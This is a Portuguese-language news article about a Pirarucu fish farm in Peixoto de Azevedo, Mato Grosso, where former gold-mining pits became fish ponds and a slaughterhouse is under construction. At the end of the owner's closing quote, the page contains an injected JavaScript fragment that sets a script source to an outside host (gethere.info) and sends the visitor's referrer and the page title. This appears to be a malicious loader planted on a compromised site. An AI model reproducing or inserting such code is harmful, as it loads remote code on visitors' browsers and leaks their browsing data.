Capa / Economia / Peixoto de Azevedo terá o seu 1º frigorífico para abate de peixes

Peixoto de Azevedo terá o seu 1º frigorífico para abate de peixes

phpThumb_generated_thumbnailFonte: Notícia Vip

Os alunos da Escola Municipal Cecília Meireles tiveram a oportunidade de conhecer de perto um dos maiores projetos de criação de peixes de Mato Grosso, a Fazenda de Pirarucus Longo, localizada na Gleba ETA em Peixoto de Azevedo/MT. São cerca de 12.000 peixes distribuídos em 13 tanques espalhados na propriedade que possui 10 hectares de lâmina d’água. Segundo o empresário, Vilamir Longo, algo entorno de 110 toneladas de peixe desta espécie exótica deverão ser inseridos nos mercados local, regional, brasileiro e internacional.

Os estudantes integrantes do Projeto Reflorestabilidade puderam constatar a recuperação das áreas degradadas, ou seja, as antigas cavas de garimpo deram lugar aos tanques de piscicultura com dimensões superiores a 7.000 M². O passivo ambiental existente há pelo menos 20 anos foi transformado em uma potencial alternativa de geração de renda.

A piscicultura destaca-se como alternativa de recuperação dos passivos ambientais provocados pelo garimpo e eficiente fonte de renda nas pequenas e médias propriedades rurais. A Piscicultura Longo trabalha para viabilização do selo de qualidade e habilitação nos Sistemas de Inspeção Municipal, Estadual e Federal para que possa futuramente exportar a carne e promover o aproveitamento dos subprodutos de valor comercial potencial, como é o caso do couro e escamas do Pirarucu.

“Para consolidação da atividade estamos buscando parcerias para realização de pesquisas, introdução de novas tecnologias, linhas de produtos para nutrição e até gestão de negócios para futura comercialização. A Piscicultura Longo está trabalhando para fornecer conhecimento técnico, alevinos de pirarucus e toda logística necessária para a fomentação desta cadeia produtiva viável e altamente lucrativa. O nosso entusiasmo e motivação é tanto que demos início a construção do frigorífico para o abate de peixes dentro da propriedade”, comentou Vilamir Longo.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top